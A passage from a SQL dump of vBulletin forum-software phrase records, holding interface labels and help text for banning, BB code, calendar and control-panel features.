', 'vbulletin', 'vBulletin Solutions', 1158575365, '3.6.2'), (32678, -1, 'ban_options', 'banning', 'Ban Options', 'vbulletin', 'vBulletin Solutions', 1192466939, '3.7.0 Beta 1'), (32679, -1, 'ban_period', 'banning', 'Ban Period', 'vbulletin', '', 0, ''), (32680, -1, 'ban_reason', 'banning', 'Ban Reason', 'vbulletin', '', 0, ''), (32681, -1, 'ban_time_remaining', 'banning', 'Ban Time Remaining', 'vbulletin', '', 0, ''), (32682, -1, 'ban_user', 'banning', 'Ban User', 'vbulletin', '', 0, ''), (32683, -1, 'ban_will_be_lifted_on', 'banning', 'Ban Will Be Lifted On', 'vbulletin', '', 0, ''), (32684, -1, 'banned_by', 'banning', 'Banned By', 'vbulletin', '', 0, ''), (32685, -1, 'banned_on', 'banning', 'Banned On', 'vbulletin', '', 0, ''), (32686, -1, 'banning', 'banning', 'Banning', 'vbulletin', 'vBulletin Solutions', 1198153728, '3.7.0 Beta 3'), (32687, -1, 'confirm_ban_lift_on_x', 'banning', 'Are you sure you want to lift the ban on {1}?', 'vbulletin', '', 0, ''), (32688, -1, 'forever', 'banning', 'Forever', 'vbulletin', '', 0, ''), (32689, -1, 'lift_ban', 'banning', 'Lift Ban', 'vbulletin', '', 0, ''), (32690, -1, 'lift_ban_after', 'banning', 'Lift Ban After...Select the length of the ban here.
The ban will be lifted at the time specified
', 'vbulletin', '', 0, ''), (32691, -1, 'never_lift_ban', 'banning', 'Never Lift Ban', 'vbulletin', '', 0, ''), (32692, -1, 'permanent_ban', 'banning', 'Permanent Ban', 'vbulletin', '', 0, ''), (32693, -1, 'permanent_ban_options', 'banning', 'Permanent Ban Options', 'vbulletin', '', 0, ''), (32694, -1, 'temporary_ban', 'banning', 'Temporary Ban', 'vbulletin', '', 0, ''), (32695, -1, 'temporary_ban_options', 'banning', 'Temporary Ban Options', 'vbulletin', '', 0, ''), (32696, -1, 'user_ban_reason', 'banning', 'Reason to show the user', 'vbulletin', '', 0, ''), (32697, -1, 'user_banning', 'banning', 'User Banning', 'vbulletin', '', 0, ''), (32698, -1, 'will_be_lifted_soon', 'banning', 'Will be lifted soon', 'vbulletin', '', 0, ''), (32699, -1, 'add_new_bb_code', 'bbcode', 'Add New BB Code', 'vbulletin', '', 0, ''), (32700, -1, 'are_you_sure_want_to_delete_bb_code_x', 'bbcode', 'Are you sure you want to delete the BB code called \'{1}\'?
({2}: {3})

{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'), (32701, -1, 'bb_code', 'bbcode', 'BB Code', 'vbulletin', '', 0, ''), (32702, -1, 'bb_code_explanations', 'bbcode', 'Explanations:

\r\nTitle: The title of your tag, which will be used to generate the BB code list.

\r\nTag: This is the text for the BB code, which goes inside the square brackets.
\r\ne.g. you would use \'b\' for [b] tags, \'url\' (without quotes) for [url] tags.

\r\nReplacement: This is the HTML code for the BB code replacement. Make sure that you include \'{param}\' (without the quotes) to insert the text between the opening and closing BB code tags, and \'{option}\' for the parameter within the BB code tag. You can only use {option} if \'Use Option\' is set to yes.
\r\ne.g. you would use <b>{param}</b> for tags, <a href=\"{option}\">{param}</a> for [url=xxx] . You will always use \'{param}\', but you will only use \'{option}\' when \"Use Option?\" is \"yes.\"

\r\nExample: This is a sample piece of BB code to use as an example for this particular BB code.
\r\ne.g. you would use [b]Bold[/b] for [b] tags, [url=http://www.example.com]Example Web Site[/url] for [url] tags

\r\nDescription: This is a piece of text to describe the BB code tag. This can include HTML tags if you wish.

\r\nUse Option: Setting this option to yes will allow you to create a [tag=option][/tag] style tag, rather than just a [tag][/tag] style tag.', 'vbulletin', 'vBulletin Solutions', 1206971178, '3.7.0 Release Candidate 2'), (32703, -1, 'bb_code_manager', 'bbcode', 'BB Code Manager', 'vbulletin', '', 0, ''), (32704, -1, 'bb_code_tag_name', 'bbcode', 'BB Code Tag Name', 'vbulletin', 'vBulletin Solutions', 1210696394, '3.7.1'), (32705, -1, 'bbcode_plaintext_attachment_x', 'bbcode', 'Attachment {1}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (32706, -1, 'bbcode_plaintext_code_x', 'bbcode', 'Code:\r\n---------\r\n{1}\r\n---------', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (32707, -1, 'bbcode_plaintext_html_x', 'bbcode', 'HTML:\r\n---------\r\n{1}\r\n---------', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (32708, -1, 'bbcode_plaintext_image_x', 'bbcode', 'Image: {1}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (32709, -1, 'bbcode_plaintext_php_x', 'bbcode', 'PHP:\r\n---------\r\n{1}\r\n---------', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (32710, -1, 'bbcode_plaintext_quote_username_x_y', 'bbcode', '---Quote (Originally by {1})---\r\n{2}\r\n---End Quote---', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (32711, -1, 'bbcode_plaintext_quote_x', 'bbcode', '---Quote---\r\n{1}\r\n---End Quote---', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (32712, -1, 'button_image', 'bbcode', 'Button Image', 'vbulletin', '', 0, ''), (32713, -1, 'button_image_desc', 'bbcode', 'Button Image (Optional) If you would like this BB code to appear as a clickable button on the message editor toolbar, enter the URL of an image 21 x 20 pixels in size that will act as the button to insert this BB code.', 'vbulletin', 'vBulletin Solutions', 1206966145, '3.7.0 Release Candidate 2'), (32714, -1, 'disable_bbcode_in_bbcode', 'bbcode', 'Disable BB Code Within This BB Code', 'vbulletin', 'vBulletin Solutions', 1194351240, '3.7.0 Beta 1'), (32715, -1, 'disable_smilies_in_bbcode', 'bbcode', 'Disable Smilies Within This BB Code', 'vbulletin', 'vBulletin Solutions', 1194351261, '3.7.0 Beta 1'), (32716, -1, 'disable_urlconversion_in_bbcode', 'bbcode', 'Disable Automatic Link Parsing Within This BB Code', 'vbulletin', 'vBulletin Solutions', 1266327422, '3.8.5'), (32717, -1, 'disable_wordwrap_in_bbcode', 'bbcode', 'Disable Word Wrapping Within This BB Code', 'vbulletin', 'vBulletin Solutions', 1194351268, '3.7.0 Beta 1'), (32718, -1, 'enter_text_with_bb_code', 'bbcode', 'Enter text with BB code(s):', 'vbulletin', '', 0, ''), (32719, -1, 'example', 'bbcode', 'Example', 'vbulletin', '', 0, ''), (32720, -1, 'html', 'bbcode', 'HTML', 'vbulletin', '', 0, ''), (32721, -1, 'remove_tag_if_empty', 'bbcode', 'Remove Tag If Empty', 'vbulletin', 'vBulletin Solutions', 1194351185, '3.7.0 Beta 1'), (32722, -1, 'replacement', 'bbcode', 'Replacement', 'vbulletin', '', 0, ''), (32723, -1, 'test_your_bb_code', 'bbcode', 'Test your BB Code', 'vbulletin', '', 0, ''), (32724, -1, 'this_is_how_your_test_appeard_after_bb_code_formatting', 'bbcode', 'This is how your text appears after BB code formatting', 'vbulletin', 'vBulletin Solutions', 1206966159, '3.7.0 Release Candidate 2'), (32725, -1, 'use_option', 'bbcode', 'Use {option}', 'vbulletin', '', 0, ''), (32726, -1, 'add_new_calendar', 'calendar', 'Add New Calendar', 'vbulletin', '', 0, ''), (32727, -1, 'add_new_custom_field', 'calendar', 'Add New Custom Field', 'vbulletin', '', 0, ''), (32728, -1, 'add_new_event', 'calendar', 'Add New Event', 'vbulletin', '', 0, ''), (32729, -1, 'add_new_holiday', 'calendar', 'Add New Holiday', 'vbulletin', '', 0, ''), (32730, -1, 'add_new_moderator_to_calendar_x', 'calendar', 'Add New Moderator to Calendar {1}', 'vbulletin', '', 0, ''), (32731, -1, 'add_reminder', 'calendar', 'Add Reminder', 'vbulletin', '', 0, ''), (32732, -1, 'all_day', 'calendar', 'All Day', 'vbulletin', '', 0, ''), (32733, -1, 'allow_user_to_input_their_own_value_for_this_custom_field', 'calendar', 'Allow user to input their own value for this Custom Field', 'vbulletin', '', 0, ''), (32734, -1, 'are_you_sure_want_to_delete_calendar_moderator_x', 'calendar', 'Are you sure you want to delete the calendar moderator called \'{1}\'?
({2}: {3})

{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'), (32735, -1, 'are_you_sure_want_to_delete_calendar_x', 'calendar', 'Are you sure you want to delete the calendar called \'{1}\'?
({2}: {3})

{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'), (32736, -1, 'are_you_sure_want_to_delete_custom_calendar_field_x', 'calendar', 'Are you sure you want to delete the custom calendar field called \'{1}\'?
({2}: {3})

{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'), (32737, -1, 'are_you_sure_you_want_to_delete_the_holiday_called_x', 'calendar', 'Are you sure you want to delete the holiday called \'{1}\'?
(holidayid: {2})

This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'), (32738, -1, 'birthday_count_max_birthdays_per_day', 'calendar', 'Birthday Count (Sets the maximum number of birthdays to be listed on a single day in the monthly view before a single link to all that day\'s Birthdays is shown instead)', 'vbulletin', '', 0, ''), (32739, -1, 'calendar_jump', 'calendar', 'Calendar Jump', 'vbulletin', '', 0, ''), (32740, -1, 'calendar_manager', 'calendar', 'Calendar Manager', 'vbulletin', '', 0, ''), (32741, -1, 'calendar_mode', 'calendar', 'Calendar Mode', 'vbulletin', '', 0, ''), (32742, -1, 'calendar_permissions', 'calendar', 'Calendar Permissions', 'vbulletin', '', 0, ''), (32743, -1, 'choose_time', 'calendar', 'Choose Time', 'vbulletin', '', 0, ''), (32744, -1, 'confirm_deletion_of_holiday_x', 'calendar', 'Confirm Deletion of Holiday: {1}', 'vbulletin', '', 0, ''), (32745, -1, 'custom_field', 'calendar', 'Custom Field', 'vbulletin', '', 0, ''), (32746, -1, 'date_first', 'calendar', 'First', 'vbulletin', '', 0, ''), (32747, -1, 'date_last', 'calendar', 'Last', 'vbulletin', '', 0, ''), (32748, -1, 'date_range_dfn', 'calendar', 'Date Range Beginning and ending years in the format of:
Example: {1}

Start year must be greater than 1969. End Year must be less than 2038.
', 'vbulletin', '', 0, ''), (32749, -1, 'date_x_to_y', 'calendar', '{1} to {2}', 'vbulletin', '', 0, ''), (32750, -1, 'default_view', 'calendar', 'Default ViewView the user is presented with when they enter the calendar.', 'vbulletin', '', 0, ''), (32751, -1, 'delete_event', 'calendar', 'Delete Event', 'vbulletin', '', 0, ''), (32752, -1, 'delete_reminder_for_this_event', 'calendar', 'Delete Reminder for this Event', 'vbulletin', '', 0, ''), (32753, -1, 'delete_reminders', 'calendar', 'Delete Reminders', 'vbulletin', '', 0, ''), (32754, -1, 'edit_calendar_permissions_for_usergroup_x_in_calendar_y', 'calendar', 'Edit Calendar Permissions For Usergroup:
{1} in Calendar {2}', 'vbulletin', '', 0, ''), (32755, -1, 'edit_event', 'calendar', 'Edit Event', 'vbulletin', '', 0, ''), (32756, -1, 'edit_moderator_x_for_calendar_y', 'calendar', 'Edit Moderator {1} for Calendar {2}', 'vbulletin', '', 0, ''), (32757, -1, 'eight_hours', 'calendar', 'Eight Hours', 'vbulletin', '', 0, ''), (32758, -1, 'eighteen_hours', 'calendar', 'Eighteen Hours', 'vbulletin', '', 0, ''), (32759, -1, 'emails_to_notify_when_event', 'calendar', 'Email Addresses to Notify When There is a New Event (Separate each address with a space or line break)', 'vbulletin', 'vBulletin Solutions', 1172226853, '3.6.5'), (32760, -1, 'end', 'calendar', 'End', 'vbulletin', '', 0, ''), (32761, -1, 'event_count_max_events_per_day', 'calendar', 'Event Count(Sets the maximum number of events to be listed on a single day in the monthly view before a single link to all that day\'s Events is shown instead)', 'vbulletin', '', 0, ''), (32762, -1, 'event_date', 'calendar', 'Event Date', 'vbulletin', '', 0, ''), (32763, -1, 'event_ignores_dst', 'calendar', 'The times shown will remain constant, regardless of DST changes.', 'vbulletin', 'vBulletin Solutions', 1200669279, '3.7.0 Beta 4'), (32764, -1, 'event_information', 'calendar', 'Event Information', 'vbulletin', '', 0, ''), (32765, -1, 'event_notification', 'calendar', 'Event Notification', 'vbulletin', '', 0, ''), (32766, -1, 'event_options', 'calendar', 'Event Options', 'vbulletin', '', 0, ''), (32767, -1, 'event_posted_for_timezone_x', 'calendar', 'This event was posted for time zone {1} so it will appear to occur on a different day on your calendar.', 'vbulletin', '', 0, ''), (32768, -1, 'event_poster', 'calendar', 'Event Poster', 'vbulletin', '', 0, ''), (32769, -1, 'event_reminder', 'calendar', 'Event Reminder', 'vbulletin', '', 0, ''), (32770, -1, 'event_title_cutoff', 'calendar', 'Event Title Cutoff (Sets the maximum number of characters of an event title that are shown on the monthly view.
To disable the cutoff, enter \'0\')
', 'vbulletin', '', 0, ''), (32771, -1, 'event_uses_dst', 'calendar', 'The times shown may change, depending on DST settings', 'vbulletin', 'vBulletin Solutions', 1200670008, '3.7.0 Beta 4'), (32772, -1, 'events', 'calendar', 'Events', 'vbulletin', '', 0, ''), (32773, -1, 'every', 'calendar', 'Every', 'vbulletin', '', 0, ''), (32774, -1, 'every_weekday', 'calendar', 'Every weekday', 'vbulletin', '', 0, ''), (32775, -1, 'every_x_days', 'calendar', '\r\n day(s)', 'vbulletin', '', 0, ''), (32776, -1, 'every_x_y', 'calendar', 'Every {1} {2}', 'vbulletin', '', 0, ''), (32777, -1, 'four_hours', 'calendar', 'Four Hours', 'vbulletin', '', 0, ''), (32778, -1, 'fourth', 'calendar', 'Fourth', 'vbulletin', '', 0, ''), (32779, -1, 'friday_abbr', 'calendar', 'Fri', 'vbulletin', '', 0, ''), (32780, -1, 'friday_short', 'calendar', 'F', 'vbulletin', '', 0, ''), (32781, -1, 'holiday', 'calendar', 'Holiday', 'vbulletin', '', 0, ''), (32782, -1, 'if_you_would_like_to_remove_this_moderator', 'calendar', 'If You Would Like to Remove this Moderator', 'vbulletin', '', 0, ''), (32783, -1, 'jump_to_month', 'calendar', 'Jump to month', 'vbulletin', '', 0, ''), (32784, -1, 'maintain_same_time', 'calendar', 'Maintain same time throughout the year, regardless of DST changes', 'vbulletin', 'vBulletin Solutions', 1200669371, '3.7.0 Beta 4'), (32785, -1, 'members_with_birthdays_on_x', 'calendar', 'Members with Birthdays on {1}', 'vbulletin', '', 0, ''), (32786, -1, 'midday', 'calendar', 'Midday', 'vbulletin', '', 0, ''), (32787, -1, 'midnight', 'calendar', 'Midnight', 'vbulletin', '', 0, ''), (32788, -1, 'moderate_events', 'calendar', 'Moderate Events', 'vbulletin', '', 0, ''), (32789, -1, 'moderation_options', 'calendar', 'Moderation Options', 'vbulletin', '', 0, ''), (32790, -1, 'monday_abbr', 'calendar', 'Mon', 'vbulletin', '', 0, ''), (32791, -1, 'monday_short', 'calendar', 'M', 'vbulletin', '', 0, ''), (32792, -1, 'monthly_view', 'calendar', 'Monthly View', 'vbulletin', '', 0, ''), (32793, -1, 'move_event', 'calendar', 'Move Event', 'vbulletin', '', 0, ''), (32794, -1, 'move_event_to_calendar', 'calendar', 'Move Event to Calendar', 'vbulletin', '', 0, ''), (32795, -1, 'of', 'calendar', 'of', 'vbulletin', '', 0, ''), (32796, -1, 'of_every_x_months', 'calendar', 'of every\r\n \r\n month(s)', 'vbulletin', '', 0, ''), (32797, -1, 'one_day', 'calendar', 'One Day', 'vbulletin', '', 0, ''), (32798, -1, 'one_hour', 'calendar', 'One Hour', 'vbulletin', '', 0, ''), (32799, -1, 'or_set_time', 'calendar', 'or Set Time', 'vbulletin', '', 0, ''), (32800, -1, 'ranged_event', 'calendar', 'Ranged Event', 'vbulletin', '', 0, ''), (32801, -1, 'recur_every_x_weeks', 'calendar', '\r\n week(s) on', 'vbulletin', '', 0, ''), (32802, -1, 'recurrence_pattern', 'calendar', 'Recurrence Pattern', 'vbulletin', '', 0, ''), (32803, -1, 'recurring_event', 'calendar', 'Recurring Event', 'vbulletin', '', 0, ''), (32804, -1, 'recurring_option', 'calendar', 'Recurring Option', 'vbulletin', '', 0, ''), (32805, -1, 'reminder', 'calendar', 'Reminder', 'vbulletin', '', 0, ''), (32806, -1, 'reminder_emails_can_be_early_or_late', 'calendar', 'Reminder emails can be slightly early or late. For example, a reminder scheduled for one hour before the event, will actually be sent between 1:15 and 45 minutes before the event.', 'vbulletin', '', 0, ''), (32807, -1, 'request_reminder_for_this_event', 'calendar', 'Request Reminder for this Event', 'vbulletin', '', 0, ''), (32808, -1, 'require_moderator_validation_before_new_events_are_displayed', 'calendar', 'Require moderator validation before new events are displayed', 'vbulletin', '', 0, ''), (32809, -1, 'saturday_abbr', 'calendar', 'Sat', 'vbulletin', '', 0, ''), (32810, -1, 'saturday_short', 'calendar', 'S', 'vbulletin', '', 0, ''), (32811, -1, 'save_event', 'calendar', 'Save Event', 'vbulletin', '', 0, ''), (32812, -1, 'selected_events', 'calendar', 'Selected Events:', 'vbulletin', '', 0, ''), (32813, -1, 'show_birthdays_on_this_calendar', 'calendar', 'Show Birthdays on this Calendar', 'vbulletin', '', 0, ''), (32814, -1, 'show_easter_holidays_on_this_calendar', 'calendar', 'Show predefined holidays on this Calendar', 'vbulletin', '', 0, ''), (32815, -1, 'show_holidays_on_this_calendar', 'calendar', 'Show admin defined holidays on this Calendar', 'vbulletin', '', 0, ''), (32816, -1, 'show_today', 'calendar', 'Show Today', 'vbulletin', '', 0, ''), (32817, -1, 'show_upcoming_events_from_this_calendar', 'calendar', 'Show upcoming events from this Calendar on the forum index\r\n', 'vbulletin', 'vBulletin Solutions', 1214998317, '3.8.0 Alpha 1'), (32818, -1, 'show_weekend', 'calendar', 'Show Saturday / Sunday on this Calendar (Setting this to \'No\' forces the calendar to display only Monday to Friday, ignoring the user\'s start of week option)', 'vbulletin', '', 0, ''), (32819, -1, 'single_all_day_event', 'calendar', 'Single, All Day Event', 'vbulletin', '', 0, ''), (32820, -1, 'six_hours', 'calendar', 'Six Hours', 'vbulletin', '', 0, ''), (32821, -1, 'start', 'calendar', 'Start', 'vbulletin', '', 0, ''), (32822, -1, 'start_of_week', 'calendar', 'Start of the Week (Sets the default first day for the calendar, which will be shown to guests with no start of week preference)', 'vbulletin', '', 0, ''), (32823, -1, 'sunday_abbr', 'calendar', 'Sun', 'vbulletin', '', 0, ''), (32824, -1, 'sunday_short', 'calendar', 'S', 'vbulletin', '', 0, ''), (32825, -1, 'the_dropdown', 'calendar', 'The', 'vbulletin', '', 0, ''), (32826, -1, 'the_x_y_of_z', 'calendar', 'The {1} {2} of {3}', 'vbulletin', '', 0, ''), (32827, -1, 'third', 'calendar', 'Third', 'vbulletin', '', 0, ''), (32828, -1, 'this_event_occurs_every_weekday', 'calendar', 'This event occurs every weekday', 'vbulletin', '', 0, ''), (32829, -1, 'this_event_occurs_every_x_days', 'calendar', 'This event occurs every {1} day(s)', 'vbulletin', '', 0, ''), (32830, -1, 'this_event_occurs_every_x_weeks_on_y', 'calendar', 'This event occurs every {1} week(s) on {2}', 'vbulletin', '', 0, ''), (32831, -1, 'this_event_occurs_every_x_y', 'calendar', 'This event occurs every {1} {2}', 'vbulletin', '', 0, ''), (32832, -1, 'this_event_occurs_on_day_x_of_every_y_months', 'calendar', 'This event occurs on day {1} of every {2} month(s)', 'vbulletin', '', 0, ''), (32833, -1, 'this_event_occurs_on_every_x_y_of_z', 'calendar', 'This event occurs on every {1} {2} of {3}', 'vbulletin', '', 0, ''), (32834, -1, 'this_event_occurs_on_the_x_y_of_every_z_months', 'calendar', 'This event occurs on the {1} {2} of every {3} month(s)', 'vbulletin', '', 0, ''), (32835, -1, 'three_days', 'calendar', 'Three Days', 'vbulletin', '', 0, ''), (32836, -1, 'three_hours', 'calendar', 'Three Hours', 'vbulletin', '', 0, ''), (32837, -1, 'thursday_abbr', 'calendar', 'Thu', 'vbulletin', '', 0, ''), (32838, -1, 'thursday_short', 'calendar', 'T', 'vbulletin', '', 0, ''), (32839, -1, 'time_x_to_y', 'calendar', '{1} to {2}', 'vbulletin', 'vBulletin Solutions', 1166828986, '3.6.5'), (32840, -1, 'time_zone', 'calendar', 'Time Zone', 'vbulletin', '', 0, ''), (32841, -1, 'to_delete_this_event', 'calendar', 'To delete this event, click this box and press the \'Delete Event\' button.', 'vbulletin', '', 0, ''), (32842, -1, 'tuesday_abbr', 'calendar', 'Tue', 'vbulletin', '', 0, ''), (32843, -1, 'tuesday_short', 'calendar', 'T', 'vbulletin', '', 0, ''), (32844, -1, 'twelve_hours', 'calendar', 'Twelve Hours', 'vbulletin', '', 0, ''), (32845, -1, 'two_days', 'calendar', 'Two Days', 'vbulletin', '', 0, ''), (32846, -1, 'two_hours', 'calendar', 'Two Hours', 'vbulletin', '', 0, ''), (32847, -1, 'update_reminders', 'calendar', 'Update Reminders', 'vbulletin', '', 0, ''), (32848, -1, 'view_this_week_in_detail', 'calendar', 'View This Week in Detail', 'vbulletin', '', 0, ''), (32849, -1, 'wednesday_abbr', 'calendar', 'Wed', 'vbulletin', '', 0, ''), (32850, -1, 'wednesday_short', 'calendar', 'W', 'vbulletin', '', 0, ''), (32851, -1, 'weekly', 'calendar', 'Weekly', 'vbulletin', '', 0, ''), (32852, -1, 'weekly_view', 'calendar', 'Weekly View', 'vbulletin', '', 0, ''), (32853, -1, 'when_to_send_reminder_before_event', 'calendar', 'When to send reminder before event', 'vbulletin', '', 0, ''), (32854, -1, 'x_birthday', 'calendar', '{1}\'s birthday', 'vbulletin', '', 0, ''), (32855, -1, 'x_birthdays', 'calendar', '{1} Birthdays', 'vbulletin', '', 0, ''), (32856, -1, 'yearly', 'calendar', 'Yearly', 'vbulletin', '', 0, ''), (32857, -1, 'yearly_view', 'calendar', 'Yearly View', 'vbulletin', '', 0, ''), (32858, -1, 'you_have_no_event_reminders', 'calendar', 'You have no event reminders.', 'vbulletin', '', 0, ''), (32859, -1, 'access_masks', 'cpglobal', 'Access Masks', 'vbulletin', '', 0, ''), (32860, -1, 'active', 'cpglobal', 'Active', 'vbulletin', 'vBulletin Solutions', 1189774067, '3.6.8'), (32861, -1, 'add', 'cpglobal', 'Add', 'vbulletin', '', 0, ''), (32862, -1, 'add_new_notice', 'cpglobal', 'Add New Notice', 'vbulletin', 'vBulletin Solutions', 1189778830, '3.6.8'), (32863, -1, 'add_new_rss_feed', 'cpglobal', 'Add New RSS Feed', 'vbulletin', 'vBulletin Solutions', 1149264784, '3.6.0 Beta 1'), (32864, -1, 'add_new_social_bookmarking_site', 'cpglobal', 'Add New Social Bookmarking Site', 'vbulletin', 'vBulletin Solutions', 1190987668, '3.7.0 Beta 1'), (32865, -1, 'additional_usergroups', 'cpglobal', 'Additional Usergroups', 'vbulletin', '', 0, ''), (32866, -1, 'administrator_permissions', 'cpglobal', 'Administrator Permissions', 'vbulletin', '', 0, ''), (32867, -1, 'all_default', 'cpglobal', 'All Default', 'vbulletin', '', 0, ''), (32868, -1, 'all_no', 'cpglobal', 'All No', 'vbulletin', '', 0, ''), (32869, -1, 'all_usergroups', 'cpglobal', 'All Usergroups', 'vbulletin', '', 0, ''), (32870, -1, 'all_users', 'cpglobal', 'All Users', 'vbulletin', '', 0, ''), (32871, -1, 'all_yes', 'cpglobal', 'All Yes', 'vbulletin', '', 0, ''), (32872, -1, 'allow_privacy_options', 'cpglobal', 'Allow User Privacy OptionsAllow users to hide the category in their profile from other users of their choosing.', 'vbulletin', 'vBulletin Solutions', 1215168376, '3.8.0 Alpha 1'), (32873, -1, 'allow_user_selection', 'cpglobal', 'Allow User Selection', 'vbulletin', '', 0, ''), (32874, -1, 'announcement_manager', 'cpglobal', 'Announcement Manager', 'vbulletin', '', 0, ''), (32875, -1, 'are_you_sure_want_to_delete_announcement_x', 'cpglobal', 'Are you sure you want to delete the announcement called \'{1}\'?
({2}: {3})

{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'), (32876, -1, 'are_you_sure_want_to_delete_bookmarksite_x', 'cpglobal', 'Are you sure you want to delete the social bookmarking site called \'{1}\'?
({2}: {3})

{4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1190989911, '3.7.0 Beta 1'), (32877, -1, 'ascending', 'cpglobal', 'Ascending', 'vbulletin', '', 0, ''), (32878, -1, 'avatars', 'cpglobal', 'Avatars', 'vbulletin', '', 0, ''), (32879, -1, 'banned_users', 'cpglobal', 'Banned Users', 'vbulletin', '', 0, ''), (32880, -1, 'check_all', 'cpglobal', 'Check All', 'vbulletin', '', 0, ''), (32881, -1, 'child_of_x', 'cpglobal', 'Child of {1}', 'vbulletin', '', 0, ''), (32882, -1, 'click_for_help_on_these_options', 'cpglobal', 'Click for help on these options', 'vbulletin', '', 0, ''), (32883, -1, 'click_for_help_on_this_option', 'cpglobal', 'Click for help on this option', 'vbulletin', '', 0, ''), (32884, -1, 'click_here_to_continue_processing', 'cpglobal', 'Click here to continue processing ...', 'vbulletin', '', 0, ''), (32885, -1, 'close', 'cpglobal', 'Close', 'vbulletin', '', 0, ''), (32886, -1, 'color_key', 'cpglobal', 'Color Key', 'vbulletin', '', 0, ''), (32887, -1, 'completed', 'cpglobal', 'Completed', 'vbulletin', '', 0, ''), (32888, -1, 'confirm_deletion', 'cpglobal', 'Confirm Deletion', 'vbulletin', '', 0, ''), (32889, -1, 'confirm_deletion_x', 'cpglobal', 'Confirm Deletion: {1}', 'vbulletin', '', 0, ''), (32890, -1, 'continue', 'cpglobal', 'Continue', 'vbulletin', '', 0, ''), (32891, -1, 'control_panel_log', 'cpglobal', 'Control Panel Log', 'vbulletin', '', 0, ''), (32892, -1, 'controls', 'cpglobal', 'Controls', 'vbulletin', '', 0, ''), (32893, -1, 'creator', 'cpglobal', 'Creator', 'vbulletin', 'vBulletin Solutions', 1215686797, '3.8.0 Alpha 1'), (32894, -1, 'customized_using_custom_permissions_for_this_usergroup', 'cpglobal', 'Customized: Using custom permissions for this usergroup', 'vbulletin', '', 0, ''), (32895, -1, 'data_validation_type', 'cpglobal', 'Data Validation Type', 'vbulletin', '', 0, ''), (32896, -1, 'database_backup', 'cpglobal', 'Database Backup', 'vbulletin', '', 0, ''), (32897, -1, 'default_view_age', 'cpglobal', 'Default View Age (Default date cut-off for thread display)', 'vbulletin', 'vBulletin Solutions', 1178286873, '3.6.6'), (32898, -1, 'delete_all', 'cpglobal', 'Delete All', 'vbulletin', '', 0, ''), (32899, -1, 'delete_moderator', 'cpglobal', 'Delete Moderator', 'vbulletin', '', 0, ''), (32900, -1, 'delete_this_category', 'cpglobal', 'Delete this Category', 'vbulletin', 'vBulletin Solutions', 1215685758, '3.8.0 Alpha 1'), (32901, -1, 'descending', 'cpglobal', 'Descending', 'vbulletin', '', 0, ''), (32902, -1, 'description', 'cpglobal', 'Description', 'vbulletin', '', 0, ''), (32903, -1, 'developer_options', 'cpglobal', 'Developer Options', 'vbulletin', 'vBulletin Solutions', 1151345857, '3.6.0 Beta 4'), (32904, -1, 'diagnostics', 'cpglobal', 'Diagnostics', 'vbulletin', '', 0, ''), (32905, -1, 'disable', 'cpglobal', 'Disable', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (32906, -1, 'display_order', 'cpglobal', 'Display Order', 'vbulletin', '', 0, ''), (32907, -1, 'download', 'cpglobal', 'Download', 'vbulletin', '', 0, ''), (32908, -1, 'edit_text', 'cpglobal', 'Edit Text', 'vbulletin', '', 0, ''), (32909, -1, 'either', 'cpglobal', 'Either', 'vbulletin', '', 0, ''), (32910, -1, 'enable', 'cpglobal', 'Enable', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (32911, -1, 'enable_disable_features', 'cpglobal', 'Enable / Disable Features', 'vbulletin', '', 0, ''), (32912, -1, 'enabled', 'cpglobal', 'Enabled', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (32913, -1, 'error', 'cpglobal', 'Error', 'vbulletin', '', 0, ''), (32914, -1, 'exact_match', 'cpglobal', 'Exact Match', 'vbulletin', '', 0, ''), (32915, -1, 'execute_sql_query', 'cpglobal', 'Execute SQL Query', 'vbulletin', '', 0, ''), (32916, -1, 'expand_all', 'cpglobal', 'Expand All', 'vbulletin', '', 0, ''), (32917, -1, 'field_required', 'cpglobal', 'Field Required', 'vbulletin', '', 0, ''), (32918, -1, 'filename', 'cpglobal', 'Filename', 'vbulletin', '', 0, ''), (32919, -1, 'find', 'cpglobal', 'Find', 'vbulletin', '', 0, ''), (32920, -1, 'find_all_threads_older_than_days', 'cpglobal', 'Find All Threads Older Than X Days', 'vbulletin', '', 0, ''), (32921, -1, 'forum_and_children', 'cpglobal', 'Forum (Also applies to child forums)', 'vbulletin', '', 0, ''), (32922, -1, 'generate_mailing_list', 'cpglobal', 'Generate Mailing List', 'vbulletin', '', 0, ''), (32923, -1, 'global_announcements', 'cpglobal', 'Global Announcements', 'vbulletin', '', 0, ''), (32924, -1, 'help', 'cpglobal', 'Help', 'vbulletin', '', 0, ''), (32925, -1, 'here_you_may_edit_forum_access_on_a_user_by_user_basis', 'cpglobal', 'Here you may edit forum access on a user-by-user basis.

Selecting \"Yes\" will allow the user access to the forum. Selecting \"No\" will deny the user access to the forum. Any changes made to one user\'s account will override the default permission settings in their usergroup.

Selecting \"Default\" will revert the user to the default permissions settings for their usergroup.

(Please note that the permission inheritance system still works here.)

